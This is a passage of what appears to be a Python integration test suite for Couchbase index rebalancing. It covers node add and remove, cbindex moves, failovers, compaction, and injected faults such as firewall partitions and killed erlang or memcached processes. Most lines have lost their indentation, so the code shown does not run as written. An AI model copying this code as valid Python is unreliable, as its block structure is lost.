t1 = threading.Thread(target=self._create_replica_index, args=(create_index_query,))
t1.start()
self.sleep(0.5)
        # while create index is running, rebalance out an indexer node
try:
rebalance = self.cluster.rebalance(self.servers[:self.nodes_init], [], [index_server])
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail(
"rebalance did not fail during create index or create index completed before rebalance started")
t1.join()
        # do a cbindex move after an indexer failure
# self.sleep(60)
# map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
# self._cbindex_move(index_server, self.servers[self.nodes_init], indexes)
# self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
# self.run_operation(phase="during")
# map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# # validate the results
# self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
# stats_map_before_rebalance, stats_map_after_rebalance,
# [self.servers[self.nodes_init]], [], swap_rebalance=True)
# index_servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
# # run a /cleanupRebalance after a rebalance failure
# for index_server in index_servers:
# output = self.rest.cleanup_indexer_rebalance(server=index_server)
# log.info(output)
def test_cbindex_move_after_kv_rebalance(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
to_add_nodes1 = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes1, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
to_add_nodes2 = [self.servers[self.nodes_init + 1]]
services_in = ["kv"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], to_add_nodes2, [],
services=services_in)
self.sleep(2)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(60)
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes,
alter_index=self.alter_index)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes1, [], swap_rebalance=True)
self.run_operation(phase="after")
def test_cbindex_move_when_gsi_rebalance_is_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], [index_server],
services=services_in)
self.sleep(3)
output, error = self._cbindex_move(index_server, self.servers[self.nodes_init], indexes,
expect_failure=True, alter_index=self.alter_index)
if "Cannot Process Move Index - Rebalance/MoveIndex In Progress" not in str(error):
self.fail("cbindex move succeeded during a rebalance")
else:
self.log.info("Index alteration failed as expected")
rebalance.result()
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
self.run_operation(phase="after")
def test_rebalance_of_kv_node_during_index_creation_and_building(self):
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["kv"]
# start create index and build index
self.run_operation(phase="before")
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,age,address) USING GSI WITH {'num_replica': 1}"
t1 = threading.Thread(target=self._create_replica_index, args=(create_index_query,))
t1.start()
try:
rebalance = self.cluster.rebalance(self.servers[:self.nodes_init], to_add_nodes, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
            log.info("If there are multiple services in the cluster and rebalance is done, all services "
                     "get the request to rebalance. As indexer is running DDL, it will fail with: "
                     "indexer rebalance failure - ddl in progress")
else:
self.fail("indexer rebalance succeeded when it should have failed")
t1.join()
self.run_operation(phase="after")
kv_nodes = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
# kv node should succeed
        self.assertEqual(len(kv_nodes), 2, "kv node addition did not succeed")
def test_network_partitioning_during_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
try:
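            # simulate a network partition by enabling the firewall on both index nodes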
self.start_firewall_on_node(index_server)
self.start_firewall_on_node(self.servers[self.nodes_init])
self.sleep(20)
            # rebalance out an indexer node
log.info("start rebalance during network partitioning")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
log.info("rebalance failed during network partitioning: {0}".format(str(ex)))
finally:
self.stop_firewall_on_node(index_server)
self.stop_firewall_on_node(self.servers[self.nodes_init])
self.run_operation(phase="after")
def test_cbindex_move_when_ddl_is_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self._create_index_with_defer_build()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
# start create index, build index
t1 = threading.Thread(target=self._build_index)
t1.start()
self.sleep(60)
output, error = self._cbindex_move(index_server,
self.servers[self.nodes_init],
indexes,
expect_failure=True,
alter_index=self.alter_index)
if error:
self.fail("Alter index failed. Error: %s" % error)
else:
self.log.info("Index alteration succeed as expected")
self.run_operation(phase="during")
t1.join()
self.run_operation(phase="after")
def test_indexer_compaction_when_gsi_rebalance_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
# start indexer compaction when rebalance is running
self._set_indexer_compaction()
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_bucket_compaction_when_gsi_rebalance_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# Do some kv mutations for so that compaction can kick in
tasks = self.async_run_doc_ops()
for task in tasks:
task.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
# start indexer compaction when rebalance is running
self._set_bucket_compaction()
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_when_indexer_is_in_paused_state(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# Do some kv mutations
tasks = self.async_run_doc_ops()
for task in tasks:
task.result()
# Ensure indexer reaches to paused state
failover_nodes = [kv_server[1], index_server]
self._push_indexer_off_the_cliff()
# Try kv and index failover when indexer is in paused state
failover_task = self.cluster.async_failover([self.master], failover_nodes=failover_nodes, graceful=False)
failover_task.result()
for failover_node in failover_nodes:
self.rest.add_back_node("ns_1@" + failover_node.ip)
self.rest.set_recovery_type(otpNode="ns_1@" + failover_node.ip, recoveryType="full")
# rebalance out a node
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
RestHelper(self.rest).rebalance_reached()
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail when indexer is in paused state")
def test_rebalance_deferred_index_then_build_index(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# create index with defer_build = True
self._create_index_with_defer_build()
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(60)
# Now build the index on the new node
exceptions = self._build_index()
if exceptions:
self.fail("build index after rebalance failed")
self.sleep(60)
self.run_operation(phase="after")
def test_drop_index_during_kv_rebalance(self):
self.run_operation(phase="before")
to_add_nodes1 = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes1, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
to_add_nodes2 = [self.servers[self.nodes_init + 1]]
services_in = ["kv"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], to_add_nodes2, [],
services=services_in)
self.sleep(2)
self.run_async_index_operations(operation_type="drop_index")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
# TODO : Relook at it after MB-23135 is fixed
def test_cbindex_move_with_not_active_indexes(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self._create_index_with_defer_build()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
rebalance.result()
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes, alter_index=self.alter_index)
self.run_operation(phase="during")
tasks = self.async_run_doc_ops()
for task in tasks:
task.result()
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.sleep(30)
exceptions = self._build_index()
self.sleep(30)
if exceptions:
self.fail("build index after cbindex move failed. See MB-23135 for more details")
self.run_operation(phase="after")
def test_cbindex_move_negative(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self._create_index_with_defer_build()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
rebalance.result()
# cbindex move with invalid source host. Not applicable for alter index
output, error = self._cbindex_move(self.servers[self.nodes_init + 1],
self.servers[self.nodes_init], indexes,
expect_failure=True,
alter_index=False)
if not [x for x in error if 'Error occured' in x]:
self.fail("cbindex move did not fail with expected error message")
# cbindex move with invalid destination host
output, error = self._cbindex_move(index_server, self.servers[
self.nodes_init + 1], indexes, expect_failure=True,
alter_index=self.alter_index)
if "Unable to find Index service for destination" not in str(error):
self.fail(
"index creation did not fail with expected error : {0}".format(
str(error)))
else:
self.log.info("Index creation failed as expected")
# cbindex move with destination host not reachable
output, error = self._cbindex_move(index_server, "some_junk_value",
indexes, expect_failure=True,
alter_index=self.alter_index)
if "Unable to find Index service for destination" not in str(error):
self.fail(
"index creation did not fail with expected error : {0}".format(
str(error)))
else:
self.log.info("Index creation failed as expected")
def test_gsi_rebalance_with_1_node_out_and_2_nodes_in(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = self.servers[self.nodes_init:self.nodes_init + 2]
to_remove_nodes = [nodes_out_list]
services_in = ["index,n1ql", "index,fts"]
log.info(self.servers[:self.nodes_init])
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(60)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_with_2_nodes_out_and_1_node_in(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, nodes_out_list,
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(60)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, nodes_out_list, swap_rebalance=True)
self.run_operation(phase="after")
def test_mulitple_equivalent_index_on_same_node_and_rebalance_to_multiple_nodes(self):
# Generate multiple equivalent indexes on the same node
self.run_operation(phase="before")
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_airlines_data_query_definitions()
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = self.servers[self.nodes_init:self.nodes_init + 2]
to_remove_nodes = [nodes_out_list]
services_in = ["index", "index"]
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 2], [], to_remove_nodes)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(60)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_mulitple_equivalent_index_on_multiple_nodes_and_rebalance_to_single_node(self):
# Generate multiple equivalent indexes on the same node
self.run_operation(phase="before")
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_airlines_data_query_definitions()
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], nodes_out_list)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(60)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, nodes_out_list, swap_rebalance=True)
self.run_operation(phase="after")
def test_cbindex_move_negative_indexnames(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self._create_index_with_defer_build()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
rebalance.result()
# cbindex move with invalid src host not valid for alter index query
_, error = self._cbindex_move(self.servers[self.nodes_init + 1], "", indexes, expect_failure=True)
if not [x for x in error if 'Error occured invalid index specified' in x]:
self.fail("cbindex move did not fail with expected error message")
def test_kv_failover_when_ddl_in_progress(self):
kv_node = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
t1 = threading.Thread(target=self.run_operation, args=("before",))
t1.start()
self.sleep(5)
# failover the kv node
failover_task = self.cluster.async_failover([self.master], failover_nodes=[kv_node], graceful=False)
failover_task.result()
t1.join()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# do a full recovery and rebalance
self.sleep(30)
self.rest.set_recovery_type('ns_1@' + kv_node.ip, "full")
self.rest.add_back_node('ns_1@' + kv_node.ip)
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
self.run_operation(phase="during")
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [])
self.run_operation(phase="after")
def test_index_failover_when_ddl_in_progress(self):
index_node = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
t1 = threading.Thread(target=self.run_operation, args=("before",))
t1.start()
self.sleep(5)
# failover the indexer node
failover_task = self.cluster.async_failover([self.master], failover_nodes=[index_node], graceful=False)
failover_task.result()
t1.join()
self.sleep(30)
# do a full recovery and rebalance
self.sleep(30)
self.rest.set_recovery_type('ns_1@' + index_node.ip, "full")
self.rest.add_back_node('ns_1@' + index_node.ip)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
log.info(map_before_rebalance)
log.info(stats_map_before_rebalance)
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
self.run_operation(phase="during")
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
log.info(map_after_rebalance)
log.info(stats_map_after_rebalance)
self.run_operation(phase="after")
def test_build_index_when_kv_rebalance_in_progress(self):
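# Rebalance in a kv node, then start a kv rebalance-out and run index DDL while it is in
# progress; the rebalance may fail with "ddl in progress" (see MB-22983), which is tolerated.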
kv_node = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
self.sleep(30)
services_in = ["kv"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
try:
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [kv_node])
self.run_operation(phase="before")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception:
# See MB-22983 for more details
log.info("If there are multiple services in the cluster and a rebalance is requested, all services receive the "
"rebalance request. Since the indexer is running DDL, it fails with: indexer rebalance failure - ddl in progress")
self.run_operation(phase="after")
def test_erl_crash_on_indexer_node_during_rebalance(self):
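# Kill erlang on the indexer node while it is being rebalanced out and expect the
# rebalance to fail with the standard "Rebalance failed" error.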
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out an indexer node while querying is in progress
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
self.kill_erlang(index_server)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after erl crash")
self.sleep(180)
self.run_operation(phase="after")
def test_erl_crash_on_kv_node_during_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out an indexer node while querying is in progress
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
self.kill_erlang(kv_server)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after erl crash")
# Allow time for the cluster to recover from the failure
self.sleep(60)
self.run_operation(phase="after")
def test_memcache_crash_on_kv_node_during_gsi_rebalance(self):
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
# Indexes might take more time to build, so sleep for 3 mins
self.sleep(180)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out an indexer node while querying is in progress
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
self.kill_memcached1(kv_server)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
self.fail("rebalance failed after memcached got killed: {0}".format(str(ex)))
self.run_operation(phase="after")
def test_kv_rebalance_when_cbindex_move_in_progress(self):
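# Start a cbindex move (or alter index) to a newly added index node, then rebalance in a
# kv node while the move is in progress and verify the indexes end up on the new node.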
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes,
alter_index=self.alter_index)
services_in = ["kv"]
to_add_nodes1 = [self.servers[self.nodes_init + 1]]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes1, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
def test_kv_failover_when_cbindex_move_in_progress(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes,
alter_index=self.alter_index)
# failover the kv node when cbindex move is in progress
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
failover_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=False)
failover_task.result()
self.sleep(30)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
# do a full recovery and rebalance
self.rest.set_recovery_type('ns_1@' + kv_server.ip, "full")
self.rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
# Revisit once MB-23399 is fixed
def test_index_failover_when_cbindex_move_in_progress(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
to_add_nodes = self.servers[self.nodes_init:self.nodes_init+2]
services_in = ["index", "index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
rebalance.result()
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes,
alter_index=self.alter_index)
# failover an indexer node that is not involved in the cbindex move while the move is in progress
failover_task = self.cluster.async_failover([self.master], failover_nodes=[self.servers[self.nodes_init + 1]],
graceful=False)
failover_task.result()
self.sleep(30)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
